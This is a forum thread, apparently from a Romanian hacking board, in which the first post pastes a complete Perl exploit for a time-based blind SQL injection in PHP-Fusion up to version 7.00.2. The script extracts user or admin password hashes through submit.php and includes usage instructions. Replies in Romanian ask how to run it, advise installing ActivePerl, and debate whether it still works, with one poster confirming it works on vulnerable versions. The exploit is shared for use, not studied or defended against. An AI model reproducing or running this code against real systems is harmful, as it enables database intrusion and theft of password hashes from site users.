Guest vini4p Posted December 25, 2008 Report Share Posted December 25, 2008 #!/usr/bin/perl -w# -------------------------------------------------------# PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit# by athos - staker[at]hotmail[dot]it# download on http://php-fusion.co.uk# -------------------------------------------------------# Usage:# perl xpl.pl host/path prefix user_id user_pwd target_id# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1# -------------------------------------------------------# Note: magic_quotes_gpc off # don't add me on msn messenger # my email staker.38@gmail.com# # Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer # -------------------------------------------------------# User Password: my $field = "user_password" ;# Admin Password: my $field = "user_admin_password"; # -------------------------------------------------------use strict;use Digest::MD5('md5_hex');use LWP::UserAgent;my $field = "user_password";my ($stop,$start,$hash);my $domain = shift;my $ptable = shift;my $ulogin = shift;my $plogin = shift;my $userid = shift or &usage;my @chars = (48..57, 97..102); my $substr = 1; my $http = new LWP::UserAgent;sub send_request{ my $post = undef; my $host = $domain; my $param = shift @_ or die $!; $host .= "/submit.php?stype=l"; $http->default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin)); $post = $http->post('http://'.$host,[ 'link_category' => 1, 'link_name' => 1, 'link_url' => 1, 'link_description' => 1, 'submit_link' => 'Submit+Link', 'submit_info[pwn]' => $param, ]);}sub give_char{ my $send = undef; my ($charz,$uidz) = @_; $send = "' or (select if((ascii(substring". "($field,$uidz,1))=$charz),". "benchmark(230000000,char(0)),". "0) from ${ptable}_users where user_id=$userid))#"; return $send;}for(1..32) { foreach my $set(@chars) { my $start = time(); send_request(give_char($set,$substr)); my $stop = time(); if($stop - $start > 6) { syswrite(STDOUT,chr($set)); $substr++; last; } }}sub usage{ print "PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit\n"; print "by athos - staker[at]hotmail[dot]it\n"; print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n"; print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n"; exit; } Quote Link to comment Share on other sites More sharing options...
Hugo Posted March 18, 2009 Report Share Posted March 18, 2009 Cred ca pt cei interesati (si mai nepriceputi) ar fi mai de ajutor daca ai scrie si catea cuvinte despre ce sa faca cu textul de mai sus! Efortul este apreciat oricum:) Quote Link to comment Share on other sites More sharing options...
fjtr Posted March 18, 2009 Report Share Posted March 18, 2009 # -------------------------------------------------------# Usage:# perl xpl.pl host/path prefix user_id user_pwd target_id# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1# ------------------------------------------------------- Quote Link to comment Share on other sites More sharing options...
hi2na Posted March 20, 2009 Report Share Posted March 20, 2009 ceva scris ar fi supper sau mai super un tutorial video pls :D: Quote Link to comment Share on other sites More sharing options...
luyzette Posted March 20, 2009 Report Share Posted March 20, 2009 vini4p iti cam place sa te lasi rugat? Quote Link to comment Share on other sites More sharing options...
BiffBuzz Posted March 20, 2009 Report Share Posted March 20, 2009 milw0rm Quote Link to comment Share on other sites More sharing options...
Laur13 Posted July 2, 2009 Report Share Posted July 2, 2009 Iit bat la pariu ca nu merge exploitul ... Ps : este expoloit in perl, active perl ... il downloadezi dp ActivePerl Quote Link to comment Share on other sites More sharing options...
Laur13 Posted July 2, 2009 Report Share Posted July 2, 2009 Cred ca pt cei interesati (si mai nepriceputi) ar fi mai de ajutor daca ai scrie si catea cuvinte despre ce sa faca cu textul de mai sus! Efortul este apreciat oricum:)Eu am raspuns la ce mia zis hugo ... Quote Link to comment Share on other sites More sharing options...
Zatarra Posted July 3, 2009 Report Share Posted July 3, 2009 Laur nu sti tu sa`l faci sa mearga aia ii altceva Quote Link to comment Share on other sites More sharing options...
Laur13 Posted July 3, 2009 Report Share Posted July 3, 2009 ma.... se executa cu perl .. cum sa nu stiu sa mearga nu merge la php fusion sa rezolvat de mult vulnerabilitatea Quote Link to comment Share on other sites More sharing options...
Vlachs Posted July 4, 2009 Report Share Posted July 4, 2009 ma.... se executa cu perl .. cum sa nu stiu sa mearga nu merge la php fusion sa rezolvat de mult vulnerabilitateadaca ai venit sa te dai scafandru pe aici mai bine lasa-ne, logic ca pentru versiunea indicata inca merge( PHP-Fusion <= 7.0.2) Quote Link to comment Share on other sites More sharing options...
Laur13 Posted July 4, 2009 Report Share Posted July 4, 2009 (edited) benny loppa scuze dar nu am venit aici sa ma dau mare eu stiu 1 % din ce sti tu .Eu m-am referit ca nu merge pe ultima versiune .Am incercat vulnerabilitatea e functionala. Edited July 4, 2009 by Laur13 Quote Link to comment Share on other sites More sharing options...
Zatarra Posted July 6, 2009 Report Share Posted July 6, 2009 Ce se mai scoate baiatul.. nu are rost sa`i explici benny ca tot nu intzelege Quote Link to comment Share on other sites More sharing options...
eXcEssz0r Posted July 6, 2009 Report Share Posted July 6, 2009 Hmmm .. interesant , gj for post Quote Link to comment Share on other sites More sharing options...
